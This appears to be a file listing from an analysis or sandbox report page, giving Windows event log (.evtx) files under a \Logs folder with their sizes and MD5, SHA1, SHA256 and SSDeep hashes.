\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx	1.00 MB	MD5: e84ff8ae39c26dd2c26201fdf0744754 SHA1: db5a17fd5e8d850bb0298e96c4e39f8b0c7d1891 SHA256: 5247dde4f15c0a6ba676bd615657fc69e9e5cd93fe9a9432d5c104bc88c51c71 SSDeep: 24576:Q8eBWilPw5Uc9EF2kxxZAriO6q0aPN+oUq2jOqgYh:Q8eBWiKWc9e3AUq3PN+lqKFN	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx	68.26 KB	MD5: 7968eef02211599f417431d81a89886b SHA1: a1547d5b2bc848c32468c8f137696f8f13ca7d6d SHA256: 997960f2de9182fbeb9828931ed56e691a754462a2eab6dedb884dd52246c6b0 SSDeep: 1536:AvlJcLM0SppiJxNkrbT+p2us904jLLwn9CITB7nvj:VqppUNk7+pUWafwnxRnvj	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Windows Defender%4WHC.evtx	68.26 KB	MD5: 67dc1129535848ce5da1b05b436f3d6a SHA1: 55a52f92b459ddac248e34b568f710e752b616a1 SHA256: 2c14ef462d91be8a233c22aabbcbed007d7bcc9525ea3719addd443acb47cad0 SSDeep: 1536:tlUh7rrBziX/yzIF4+3OmDAIbH9EJMpbR4jcJfKcdnS:6sPy0X3OQJbdEJMlGcJicdS	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx	68.26 KB	MD5: 25eb7bc4c94c6759d05336c99004d3fa SHA1: 18b9d1b4a8b6d563540c9d20b290f5b10319c2ad SHA256: 131d7618b025f0a8fc0230e77b479f045d10e6a24a1a6c2091e46a7e9226b7e3 SSDeep: 1536:EG1Edr7rP/hJ9i3BSkcEqS1vJ1l3YlblFkJacOmbAii:p12H/hJ97kPvJH3YVlpcOmhi	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx	68.26 KB	MD5: a81b8c8983724eaf9860f8fc57731389 SHA1: a31699284da6583df2b97a8d9dcfc28cdb4c83c5 SHA256: 1afc9fa71e41e7238425ea072539ba00021ba74bfd06e471c4dbbec69a49c1d3 SSDeep: 1536:9ymEcPWwoy0Iss2zYDD5OqdbPztfuYVKX6q/J:50Iss+YROabLtGYVpqR	... File Actions Show Properties Download
\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx	68.26 KB	MD5: a3ed40993bf0bc75129dcbd88c53d122 SHA1: 20599eb52f8482f4bbdf1f1d67c57d00fc5e899b SHA256: c6072b3594156a2400e5239d8203b9f2ff3bcd97380d1a33b4655d02c9f5e9e3 SSDeep: 1536:UKlJ67hO5xZzf5ZDsAfr/CNWXyJKj3U4wpWf0m5:xJKh2RZDPAWX+2kfWsO	... File Actions Show Properties Download
\Logs\Microsoft-Windows-UserPnp%4DeviceInstall.evtx	68.26 KB	MD5: 5e666dcee61adcd461374dc0ff1ba1ee SHA1: 8ceeccf532e8f96428ca4a78c1ec1f498e07dae0 SHA256: 33ee7c11b3b499283351597da226e46bd2799d60fd37c904811c1186aca66cd8 SSDeep: 1536:FsXcTC8uJ9hoplrE+5/0Qmj6Cx6OcPQNHfXCsRO8lQl93svM4Pq7:FSN8g9mTl/qjx6OrNPCj8lfMP	... File Actions Show Properties Download
\Logs\Microsoft-Windows-UserPnp%4ActionCenter.evtx	68.26 KB	MD5: 4a1a63ec67e9dae27db6c16cce4dcc71 SHA1: bc097864393843068346d5b1fb215014f8a3a227 SHA256: d88e72d8aaa34e6f3a88db37fbaa319fee248717afc852273aacb2e022261bbe SSDeep: 1536:eBYqlc6iPL9OcCDM6TzeoCvPIPaG0n+G2+A7GJ1Fal:aYCPiDAcWM6TK5QiG0+GoI1FG	... File Actions Show Properties Download
\Logs\Microsoft-Windows-TWinUI%4Operational.evtx	68.26 KB	MD5: 72b610844058c7f6215fe02f9f9ac86a SHA1: 934c150e1a1d9d827ef3e3017c915d8d4736f5c1 SHA256: 3b90fa1e857ebaf0cae82ca38e29cbfa8096dcb7f5fe9d32dc8016f01a06549c SSDeep: 1536:fo1UtAeGziDI+mN0gFjOTyEcmfsxwzkyg5wQxBMLU+zDwFpxWEDZIKkE:A1spGOONHfo0xwzXg5wQx+LjEFpYQt3	... File Actions Show Properties Download
\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx	68.26 KB	MD5: 63d4453d55dda40e30c6b387b52680d2 SHA1: 5ebb98d7e6410d54329d5cc22e19521d8181a190 SHA256: 4a4d1702df1440d5c5bee9cfd89a5676598916fa564eb3de81226a437e3ae9d2 SSDeep: 1536:xk5BEGTawn+h7lUeqVbt7ZBRmN8uOoAogj+wb:x22GJu7lbqVBZBR48LoAog+wb	... File Actions Show Properties Download
\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx	68.26 KB	MD5: b2020462c9ca87d7b38ac9e07f15e94c SHA1: 34e9298af68586feb28a92b53f0e492ff967aabb SHA256: 7d476451d808bd5c96e33ef708830a954ac6c27a1134b09946530215dacdb9dc SSDeep: 1536:6ufqUL5Q42fVifzEyYhhGIRMPihWEJ4uuF3paS6vu2mEvhdAldi2j:/fqgQnifzEyYhhHMt64DUuSvhu/j	... File Actions Show Properties Download
\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx	68.26 KB	MD5: 002c8fd1e5938c397e594d62e1696941 SHA1: e183335c0f9523f9ea6f4928bb179af69474eeeb SHA256: 73a9cc2f2fdcbc40f48899d1b4da61c16c31a9677f3e5f3186f9b5c3ec47d696 SSDeep: 1536:HDrvd+Oa5gA2XMSLhs1r2hLLZvkQQp0NUnh/2amK4zO7hIWoE70FkFQpwT:HfduB2JL+GhArnhvmK4SOWySnT	... File Actions Show Properties Download
\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx	68.26 KB	MD5: 7a31949dafb2b1fb7c947650872cdf84 SHA1: c35f19b2b1ddcb3744eb5010115bf56e11cdfa5f SHA256: ac6e0d2ff8d46a20ff5002a2f7c5528e2be5146fa5008b459e3737e98b8efc59 SSDeep: 1536:8CGw1TGV+Omef3evwAvsQU7HP+y5lPMDk4g3KlLs6ttg543A96E:/GaTGnf3euQ0my5lkg4g3KlLs4tOJX	... File Actions Show Properties Download
\Logs\Microsoft-Windows-TaskScheduler%4Maintenance.evtx	68.26 KB	MD5: 759b07e399286ca5c42eec7583984d91 SHA1: c873deab3cacba91b56270e9b9c00a3526853bde SHA256: e5437c2cfb942423a07c6485e23c7d40c1085380f05405f3cdc96c0bf07c4183 SSDeep: 1536:5VC0D0KgyUs8kvg/Okbwgt8CMSgipjYmaNnXZHgqHEwKfCca5Q6m5gY:500DTgrnaWOkbwg1eiBYBZHg63cX6MB	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Store%4Operational.evtx	68.26 KB	MD5: c4ce463bdbcf54ecd9855538cfb3d4c0 SHA1: e50ad5c52504f28d06eb4d9ecea076c1b9d23df2 SHA256: fe4667dc37bef0e7b8950c267ca98933ab1d345bd42ad97a1bb9586a7a3914ec SSDeep: 1536:d2I1LJLpMLVaQtp8xQ4D1KSb5t6lteNVmk5ZwaLq/E:dTJanp8xXBKO5t6Le7RB	... File Actions Show Properties Download
\Logs\Microsoft-Windows-SMBServer%4Security.evtx	68.26 KB	MD5: 8c10ef7d525289f1727930da31d18087 SHA1: 3336137e277d60dfab65d75700b1e05af08c7f3a SHA256: f8f4dce13f101b3dbd4c6795815d1a776ff3aff71bf814b2638967adc149017f SSDeep: 1536:Sf6jIYUEHenkLqXgESqwsrYP/E0Ffr3JKQcgqdLz7vQND8FnjAAA:hbU8enkev14PVjJKnhzN8	... File Actions Show Properties Download
\Logs\Microsoft-Windows-SMBServer%4Connectivity.evtx	68.26 KB	MD5: 4ed343a2a1a666e827269f53e375071d SHA1: ed0ff54272c0b76ce50c8dcf9772322ca6fc3bd0 SHA256: 818a4122b81695447711bbf5500aeea72937a58001401f0c95cd9dfdde2ec659 SSDeep: 1536:MWrVmbJtdugV4HqoS+Ve0qg5wRE+M49lMQocjmFX7llreayiT:MWrVyJ3VEqoxVR5wRE+qqmFLvrea9	... File Actions Show Properties Download
\Logs\Microsoft-Windows-SMBServer%4Audit.evtx	68.26 KB	MD5: 13597df1eede847abe4755e738c54612 SHA1: 471e13bf7b1e0d7ba718d3c3260d55deec5ce75f SHA256: ae317d2b826f50f54b4136bddae4b708b0a14af3c34c30a5e475e580ea6221c5 SSDeep: 1536:twl8tJpuMlsQwTl6ZFFxY+gKp4BjGOYwn1ISW6z:twl8tJsM+Qr0SLFwneSnz	... File Actions Show Properties Download
\Logs\Microsoft-Windows-SmbClient%4Security.evtx	68.26 KB	MD5: b5f59e589f84b09b1e0b9f017171c240 SHA1: be12d8ff76953cec0bf142068d0d4432cb07fe1a SHA256: f2c6c9a606c8919a8abfeed87fa8a33e0c510e4f34267590236593430bd28aa4 SSDeep: 1536:xkVFmK0WPHgBscCTrU67NsNASxXtqXfkgRROBNz2/onrNeOyuPMCuLiOlf/:xkDxOhKU6qGSptUkZBNqCgD7LBt/	... File Actions Show Properties Download
\Logs\Microsoft-Windows-SMBClient%4Operational.evtx	68.26 KB	MD5: 0d52f4615baba7acc4b9f8f5cc17323c SHA1: 02b0ec7e208fda54a07a21c623fbab962fe60aef SHA256: d39bfe5bcda9e256b0f14d840dde801f1780b6cfd902d4177c15a1c991ee22c2 SSDeep: 1536:bARd9ICrnqPSu8ZIS3IQ9T0lXjPoEL1xMurGlHNw1zZjXMwOf:sr+Gq09T0lXj51xZWIZz9W	... File Actions Show Properties Download
\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx	68.26 KB	MD5: 8318fb1b6b665cbb2b826b2ba3eb5bed SHA1: 23c2302b2c883635a7173d974763cd91451adcd8 SHA256: 0a45479fe4e3ffc059da47ffd4ec3449a504f0c81c39edc5c1049045dc3a326e SSDeep: 1536:WRZN0XKR/4f0mXNcFAdh60Oi6ZznloeA2e4E06yuU:WN0a6f0mX2Av61qe3e47nj	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx	68.26 KB	MD5: 6e991368627ce81b248b7d5da947c77e SHA1: c2e643016ca7b7e16be14bc3ec41319b11fa7a31 SHA256: 3b1e4631c46ba1844ca9578b9e0a9a0866f77bd489e4cbc0db8eda46a09f3f5e SSDeep: 1536:+1xBu0oY6xsYOQbyb8Tve9ozSdrLqoET7n5zN:SBnl6xsY7vN2ErzN	... File Actions Show Properties Download
\Logs\Microsoft-Windows-SettingSync%4Debug.evtx	1.00 MB	MD5: 0735acb5e8f9aa9efef18bafd9762017 SHA1: 91f57d3ae856f9ef025e06271f967ee92b7cf0d3 SHA256: 5548a24ac03d62df1c53f3d5e3fcbf0f97d9e2391e7b20a6349ab2b25587286d SSDeep: 24576:oRVprCm/Ot5TpDvXXnp1FVrTL92DZre+uin8PgRoTsjyc:OVCmqRHnpVTLkDswtasX	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx	68.26 KB	MD5: e882a8b467a4179e72b1375f932b163a SHA1: 6d2280e5b0bb742c7b6729a5c57a09ca1e7e889f SHA256: d5a607fb19ea7eaacb09681403177cbc4cd457148aac0a110938979e73f07704 SSDeep: 1536:/An5OSGdtspZCuNpbCIWUkf4LfYToBT5Ww8xLSV0JYhUuNWDJrWMAoeyLICx/M:I5OSG4ZPNtzWFfYYToBIPx+qoRNWDJrc	... File Actions Show Properties Download
\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx	68.26 KB	MD5: 1067076ebeb5661575d359c1d5bb5b5d SHA1: 560a4e7077e762b40a8ff020ebe74735f27b228b SHA256: 4f4af6d32d11eda67142ea530b1bdaffcbeeadebb10e599f6d0ba6292d8500cc SSDeep: 1536:EvUA4/012J0XbLYmxZBWzhFVrB55l3GVMvFhXijPOzJlTurruvz7:Evnf11Qy6zhfrtMVmDiOWru77	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx	68.26 KB	MD5: 603aafb155aa8f7005198fa31d1f8746 SHA1: dc98ae9cc217f2a4c5d69cd0bdcf66a357f7d78b SHA256: bca39123f65fc6b8614e3f0a4b9e30df076ce843138354c541dee7d9c9ee308d SSDeep: 1536:gVy6gdPs/w5b/S0/ROrOptUBoDk4Pec+R87nkjHyweGYQ0hvteU8o3:gc6gdPs/wPhtUODV77nkOweGl0feU8w	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Ntfs%4Operational.evtx	68.26 KB	MD5: b8cbff666b45572402341cd551079526 SHA1: 8a0777a7e69b271a53901a51a190163821527e45 SHA256: 77631608fe74dfc50e5f0d71acb299ede486e2fb28eda18f93b8435753119d8b SSDeep: 1536:GCdE7EC/BZYXbulZTEhTa2AS/DuYuhQjasGXP2Kt+YZp9szA+ysv:PC/BRwhTagDuYzaf2O+mszA+R	... File Actions Show Properties Download
\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx	68.26 KB	MD5: fa7ecf46c9f5e5c27b2685b949b8ce6a SHA1: 634b9ce5c7cefa0f4430f772d239d24a6678284e SHA256: 75ff41893338357041ab1c2eebb16ef6f766a26f10620820e1197ea78ade5f1d SSDeep: 1536:ZPJLRrgtG/0Gg8Qoc6hIs+eMW+fuzqvudF1uWMXEXJmOTzE0O:BJdMS3QoIs+eMWv481Y6EOnE0O	... File Actions Show Properties Download
\Logs\Microsoft-Windows-NCSI%4Operational.evtx	68.26 KB	MD5: 9b6b93b1e2980dcda9506fbd109cbbf1 SHA1: 2787d6e35fa1b44d7876f833e9ac266b7de785a2 SHA256: d793e16b4664d15118e8dcc96303c4604ed1d0e8bb2e492dcd045ae1dd40711f SSDeep: 1536:oN+DtMBaVpOiwRI/m1blBiNYJaxHxhoJxSEtbgBBJrIA431:oQJMLI/m1bl9MxHxhAxrgJrCl	... File Actions Show Properties Download
\Logs\Microsoft-Windows-MUI%4Operational.evtx	68.26 KB	MD5: 4b8e3f6a118944802d0e628b0db3233a SHA1: c0ea4955904c786cd174e1303aaf95d140ea60f5 SHA256: 25f856d4b4c7e9ebda2d69e032f959b3a86a42d9b6ecec4eeceea780939249af SSDeep: 1536:aPUL1Li0p+G2G3ORJcWMbmani4FvpggepuKVjH:at0pRCxDMi4D9eDd	... File Actions Show Properties Download
\Logs\Microsoft-Windows-LiveId%4Operational.evtx	68.26 KB	MD5: e2822294d49557526fb3e8dce9d190cd SHA1: 78a8b626624a0e578b69dab695422dc83d746234 SHA256: fbc31b1d1296d7847cab4a940684e20e240e6bb821506af46108da2f47cae3ec SSDeep: 1536:lp4YDKBxq9FCj5pkFd25mMZoHVLwZIvEw8JpnjRqXbGOWh7sNuKJwBF:z4GTqsEssIvYJpncwRKJc	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Known Folders API Service.evtx	68.26 KB	MD5: d425fbc7652cf7af6db92b4858ace0a0 SHA1: 2034daa94414ceca9ba90eb963e65c2427704373 SHA256: 2d78c4b14aa1e8e05f6c54fe2f11e2a8e1f5dff1ae7e5f168f89e9724642ac89 SSDeep: 1536:pupJGpwNPkU4EXMTDnuIkZjDQahI/B3LozDT122:sjBZ4mlQNboXTb	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx	68.26 KB	MD5: 4494e7d420b0550bbcb2d24111e7b01b SHA1: a6c2afa23ea2b21558c302ba8487b1822286c0e8 SHA256: 0f8999aeebfa9fd9012d0de47070c30f12b8e9bdf4cb4d5176aba6b2da0388c7 SSDeep: 1536:D5/nsHcMCeapUl7OsXYB2yWNpiSTwYe+vY:D5EcMZUC7jH3i1wY	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Kernel-WHEA%4Errors.evtx	68.26 KB	MD5: 4d8a7975a560bbfda51a9c4d5961581f SHA1: 7c6fc29ea6cfaaddff2cefdd151442d56f97f5a2 SHA256: 4006c53c6c0ea8c74a916deba00f8e42287bda982fd12c2b4e95f05460cfc5c4 SSDeep: 1536:HJ7/ZFtTl8aFRvzvtZihUwcrL3DIPFwQLAlEn84Db/r3Zxh3:Z38W1zv7ikrrDIPuQ8mvH/rbt	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx	68.26 KB	MD5: d03e2a71b602788b173c7a13840f89b9 SHA1: ba0cc92a2665b4524afea36117285d11ff4ec236 SHA256: c64aba0598168be4e23bd5a1ba8ccbe2d979e0235bd49f76bb5b321ea6a0bd6f SSDeep: 1536:085tKZkDV4j+WbQt6njmnCWbIclW7EDdf+w4Cm8sx:F/KZk4jZk6naIcY7Q74CM	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx	68.26 KB	MD5: 0568034d1ca22fd5879c74d0de0d7574 SHA1: 132a553724232f173597cd393c4637fbb0f19d9e SHA256: 6e8266f2d49921ae46c41ef7fa1caa1d3e2fb5d7297dbe55f330d85586ec97a4 SSDeep: 1536:Xl6qtE67UOTL4DrceFlID+lI+6sMY7meBwUPcOdx/2Q0okaPSm:VrpYfPccIav6lBeBPFdx/2jL9m	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx	68.26 KB	MD5: 4bfb94c7e480f41ebd6fca91475c02fb SHA1: e8c727935a2d7c6a0a42f08d4360058d7a24b8c5 SHA256: b88dc10a08e0f3df4443b68ec0b2eabf42459a065de2064387b85c2df16b1cc0 SSDeep: 1536:sEWXnDTXEYRS+8VOjOWKYg7R1nf+s4ekVhdNsBY0j7sAAFBj82ELkV4:bYAYR7gT+s4ekTejjI/8Le4	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Kernel-PnP%4Configuration.evtx	1.00 MB	MD5: 2462868ddd5404886c700f11813fc42e SHA1: 9adab7c68646ce9ff12691238fa07fd518d9eeb7 SHA256: 7081af79f61be74e35c2eae0879739093d75a4af8a0eaa495f27c1ffc6c2b001 SSDeep: 24576:5qujSQOgIMKDhBjE22eTedebSiNCjZAzCj89us:5vOgat1EOSisJjTs	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx	68.26 KB	MD5: f9c452408abe6b13e7850a47896ae611 SHA1: 6a61a9c18a8d663eb1067719d1c4d521fb435a9d SHA256: 9f06028946da08a5916f44e6949bb317939d2d7848a6113615f12b387b2f8e39 SSDeep: 1536:BLXIUwe4VCLggMbtBv8yyJJ81Aenl6LDaP9QpRlSa3O34:BXITe4VCLgF8yvjlhP6lSIO34	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx	68.26 KB	MD5: f11c5c4074bd6e971c6c86167073c000 SHA1: ae4b7a2ecc56fa4fa2e3842dd025bcc9c4f04142 SHA256: b15e3e2e2b457582eb48a03bf693b2e7c1e4c6a35b33dea30993b1773549c602 SSDeep: 1536:beFZFe5pUVdrXwjZ1wLnlRf79oQI2gLlcY7fSfXmKmkJJx9:bGe5pUTXwd1+l17uLaQfW2dkJJL	... File Actions Show Properties Download
\Logs\Microsoft-Windows-HotspotAuth%4Operational.evtx	68.26 KB	MD5: b94e5f47c807a83b77b83f1829acc6fe SHA1: 2cbf9086e683e53d4a767a18eea4aab8da733282 SHA256: ffce8abed2a41e2a973abd57f9c3e7a611ffd1f908d62a0c5b0b9f01d062af34 SSDeep: 1536:w5+fUX4+5EHvKVKLG2KVv4Bni7RbZH2cab+6cLpehcgU4iUg53be8p+JGs:w5+fUX9uIKC91SU8Bb+6cd3D4iUQbe8U	... File Actions Show Properties Download
\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx	68.26 KB	MD5: 7de5ede53b5c72e2a09ee7162dc9efc7 SHA1: d26c82e0c5aedb23c3103f1d534f8364cf49416a SHA256: 55984562d9ce904649e246548ae61274cbb5bce64c384af7cff301405f89779d SSDeep: 1536:9ZuqutTXxj2Jzwy7jnAP6OZoljCUt+e9XBbh9dmhqQ3FQbojD3984:yltTkXAPiCUt+e99Yhfiu7a4	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx	68.26 KB	MD5: 7cf9c2e95cabace8f320b4069ec88825 SHA1: e2dc774376e31ce51fa1072c71d8a483b3800f5d SHA256: 97eabca026f2a33f7fde4eddbab4df9d9594de3d7fe7af00f87a423b05438530 SSDeep: 1536:qeAgAW7JgpT3kEpQJclVbKDc3G0xA3Gi5pBEw0xhAyJds58bqh:PAgA/t0EyJcbKDQA3G2TE2w658+h	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx	68.26 KB	MD5: 6b354eef262d247aa69f263688dc3558 SHA1: 95e2a13e75d88f762515d1d121025118696dd79c SHA256: f0a004545ef07535430e122d52e95add0c7a3f0bc286b383fdb46d9b0f12dd1a SSDeep: 1536:VbbeoZhq/k7w2fRUTcRSat4pkZ7Dch9ibD:/ZuokTcAO+2Doi3	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Dhcp-Client%4Admin.evtx	68.26 KB	MD5: e9a7e7f77d6b4a2506d7b826dd4c350a SHA1: d46a9b9a0605f2d12f96de49762444bba244f9ab SHA256: 4b89ed33d7238d7224d6677380e6ff36cbdb802e40b8a93e9fd84a3fd71e6175 SSDeep: 1536:Et53eg5G3vfFuErQcbg0nou9XdUkNLc4p36LN0aE0aBw7K:Oh83vtuWQknlDNLlgps0tO	... File Actions Show Properties Download
\Logs\Microsoft-Windows-DeviceSetupManager%4Operational.evtx	68.26 KB	MD5: 6dc7cdb48c490a3f14b4155a2fd84e5d SHA1: 2b986400fca3e0494ff55cf9158a8234ea54b01d SHA256: b938e1a91886edd35eefe3b7be0b4fa0b2ca92532f2f0472b0fb9afa069cc80d SSDeep: 1536:QUhCAVEP5rFD1mZRSAQOUMhq+X3ov033EMI:SH5Z1VPqhq+IsA	... File Actions Show Properties Download
\Logs\Microsoft-Windows-DeviceSetupManager%4Admin.evtx	68.26 KB	MD5: 0435772ce119730bfd53def893d27547 SHA1: c4003d2b0fb285fa462ee8c2ecdbc8eea340623d SHA256: 39bd365137d318f0b6e1325e381c736e3312b1d92d4f165cc14371f7a3a5990d SSDeep: 1536:W+4OaXvxYw6nKpjeKN3g1joa5kGlquktfE57CvuZK1/p:Wea/ljjeQQ5oTGlVefEBeX	... File Actions Show Properties Download
\Logs\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx	1.00 MB	MD5: 16c1fa658e1bb5c8d9794ba3890d63ca SHA1: f9ab5f1b041a07065b4c3665c385d45d3a80c2d7 SHA256: d7ed80af1b7895e8a441815d5b35d4f0c1a91578f0a23a2830b7bdd338fe8c07 SSDeep: 24576:K2cJCEip7NZb7NlTKsaUN5wUSFI0A30niH7:K2c1e5ZbaVUuoE47	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx	68.26 KB	MD5: 23e6d00ae66e988a1a3737fb912871bd SHA1: afe628001f465e8f0555fd301c84548c0f346743 SHA256: c9ad6896771d612e17d35d02ef2c9ebe0d96eabfdabdd43d493f31f50a16cdfc SSDeep: 1536:1c8+R95rl+LyM3xU9fCfpEjww7Uwe6gE7boJSBQ4h:S8+lloyMBU90pGww7BewbpFh	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx	68.26 KB	MD5: 614328e3e24ce5f2a9995613c1e8b759 SHA1: 54dea9b5d573af8a11870dacc777a9323b12193e SHA256: 47e60bc65ef9b4bdb9784da0ad5ceb515f2ab62376f75f8f43e1dc1bc50365ff SSDeep: 768:hNIg0ebhlrEsq9YRZXpGstoDqyoFmAxoEknjlM+VsgTt+bjS2Roka+K9bGpYSib4:hNRj3wsq9YlpogmWyhJV6SlKK2CGSOf3	... File Actions Show Properties Download
\Logs\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx	68.26 KB	MD5: fd1a6623cc96f53a68348e146a9af918 SHA1: 7bfa55e267e535d834391d71617bda360ad037aa SHA256: d4a5061ca822b28450ccca5ab48dc481d1c31cc65c85485aa7271adb9632f883 SSDeep: 1536:KhoBhSS+e/cfxHJWorMNG0wzqooSXyb6Y1MPVALiskCKRYfpSaJGC:haXe/cfiV1wzqooyzY1MsPkCoYR7	... File Actions Show Properties Download
\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx	68.26 KB	MD5: a95efd2c845889992b74e8cad953dbda SHA1: 0ce2b69d57ab35775e0abc909228839550ea91e6 SHA256: b51bb2838857b4ade4de2dc433203fdc07e68c893ca285bfa863c30551e25c7c SSDeep: 1536:FwnCDCRnF0mXk3xain8c72OvfurZyymW2fD2U0CtRCqiFH+2upq0gbm+f:4CDuF0Ts68c/WGxyUV7CPFe2upq0kf	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Bits-Client%4Operational.evtx	68.26 KB	MD5: 3f716c23ae271e8b36886f87d55d4d75 SHA1: d2d12c9348b8316e93b43f765d0d36331ae67d43 SHA256: 87b866203ffed689469e20f53c48be4d805b98d27f8aeb49b89a75ae7892909e SSDeep: 1536:rQLzYOGbsPlw1dvXgM15aRe+nVMXaX1A+F4ha:0L0O5lw1dvXgMX3aJ4ha	... File Actions Show Properties Download
\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx	68.26 KB	MD5: 0824b2124ad5221c9f61b609c58599b8 SHA1: 1fe8ca37f94ab6277584ca45f22d416fdb814149 SHA256: e723afaecdc0e44e22fa8d9e1edd00725de2f3905fad942acbacf2f2a7f49558 SSDeep: 1536:YNhFJCtMOnQ14QxYhvERKMYVDPVWsWC/mn:YN/JbaTYKTdVWY8	... File Actions Show Properties Download
\Logs\Microsoft-Windows-AppxPackaging%4Operational.evtx	68.26 KB	MD5: 48cbe86c5b838f0be8df4f47889c0f84 SHA1: fbab89148d558d7248cee81899bdddc8aad9491a SHA256: 36e390039b3e73f9c341048bc6486ede12af0396f31050578fd51bc6d88d7d54 SSDeep: 1536:kVGDU9Ma8ueW/7a7kU10YQqgaUY7Y1zFeRAisd9:kVL8q75gCaUY75Abd9	... File Actions Show Properties Download
\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx	2.07 MB	MD5: b9376b9a78cb53c14aa346b7a04656d1 SHA1: 85a67b0ca5d4f615f68a557472a8a208c16f38a1 SHA256: 522e99a4e1bfe2c2e9283ecdab954a90ec108be91d95af6f1501ca2b04b37a37 SSDeep: 49152:/+X3VzFVEc65r+UdAXv/RUES6FgQJj3nS8sT4h4iTKEu:/uPbaAXnRUEYQJjpsT5r	... File Actions Show Properties Download
\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx	68.26 KB	MD5: ed8e48729fb0ed79847cc6a091182cc1 SHA1: c2060368cc2eb2e319e991acfdf1ec08c000307e SHA256: 036ef166d96da9133b52636e0aec11079c97c8629600ec8c969b61ee655a806c SSDeep: 1536:SzjY7pGgztCVuJgxqCpOXseWANKJWsSvrECHC3mX8KS8CrB:S3gpGgBJlDXse13sCS3mMp	... File Actions Show Properties Download
\Logs\Microsoft-Windows-AppReadiness%4Operational.evtx	1.07 MB	MD5: 09bfb36af63ef2510f63e08796f60f61 SHA1: 1573944eba178d64d944839004f6f31627013b98 SHA256: cb16245ec40a0b5ad7715296411250be1586a1cc2c3da53032c32bcf82898ca3 SSDeep: 24576:HO7IeX6aF3qGzEkmQYAX9e+dP9GVQTT2cPB/PSlDtDiPLKNzIW2:058GzEkmQYAX9e+dVSQXbByNtDQL0r2	... File Actions Show Properties Download
\Logs\Microsoft-Windows-AppReadiness%4Admin.evtx	68.26 KB	MD5: be97955f5049fa32a40bd62dd14bcd99 SHA1: a86245ecdd06eaf9b48188cbb44772967c98544d SHA256: fffacac0a9a922af03c383464cd7cc17a2d3cffe955c2621b1613b4f107dc697 SSDeep: 1536:4LXrvoCXx/K+ni0QNbQN38c4ZaQ8XTYZBySqlJIce9h9q:4vvXB/9nENbGVMarYDnFL9q	... File Actions Show Properties Download
\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx	68.26 KB	MD5: 61386b47ab9f5a0b0862bcadb5c7ed79 SHA1: b0ea3d4a8cb50af7cd3371302d37372901e92a24 SHA256: a3ba0b1b1d5c1ebd8d65eaa192789a4e27aff06139737ec355a52212c9ec4589 SSDeep: 1536:snK6OfGJMlUrWHfm3T91JJVBP0owARPHJI8m0wG3jhI2fjvzJ90mR:snK68LGwfqBrBPVdH9wG3rBemR	... File Actions Show Properties Download
\Logs\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx	68.26 KB	MD5: 5dd9ab9f440d476a7d16604c4995ee9c SHA1: ac52ca67a2265eff998c2162e793e746c6fac38c SHA256: 43ab56061302675cbd57367fc8354b20323bc4c190f51dd094c07819fbb06559 SSDeep: 768:iLZbUYV6oSllj+bzVwxbY+RbBeCgthR7L9EPtffcXRMJRy8qZb1Ii5H43irnlNk0:6Upj+bzVwVTRdeCg+MSurb1SirnA3R6	... File Actions Show Properties Download
\Logs\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx	68.26 KB	MD5: e237aec557632fdee60f48d952c70d89 SHA1: fc2c2a17d599c1403dba370fb55b6425fa8befad SHA256: 6938634416bab5ea6630a3b6f8a1426283d81b4b68cbf3a100a709f6265ca618 SSDeep: 1536:miA6cCz4tbtfZj1ZEwruKQlth6ln1r1tCX5PjG3naKDy:2cktB91ZTrj88j+Mnb+	... File Actions Show Properties Download
